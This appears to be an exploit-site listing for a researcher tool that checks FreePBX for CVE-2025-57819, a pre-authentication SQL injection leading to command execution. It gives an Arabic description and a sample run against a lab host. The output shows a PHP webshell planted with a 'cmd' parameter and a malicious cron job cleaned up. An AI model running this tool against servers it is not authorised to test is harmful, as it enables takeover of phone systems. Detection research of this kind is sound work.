Sploitus

Exploit for watchTowr-vs-FreePBX

kitploit · 2026-08-28

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WATCHTOWRLABS-WATCHTOWR-VS-FREEPBX-CVE-2025-57819
# CVE-2025-57819 ثغرة تنفيذ الأوامر عن بعد قبل المصادقة في FreePBX

أداة توليد أثر الكشف عن ثغرة تنفيذ الأوامر عن بعد قبل المصادقة من نوع 1day في FreePBX

## الكشف أثناء العمل

يحاول مولد أثر الكشف رفع سكريبت PHP أو إضافة مستخدم جديد إذا فشلت عملية الرفع.

root@kitploit:~
    
    
    $ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                             __         ___  ___________                   
             __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
             \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
              \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
               \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                      \/          \/     \/                            
              
            watchTowr-vs-FreePBX-CVE-2025-57819.py
            (*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
    
              - Piotr and Sonny of watchTowr
    
    [+] FreePBX CVE-2025-57819 Detection Artifact Generator started
    [+] Sending exploit request
    [+] Waiting 2 minutes for DAG script to be created
    [+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
    [+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table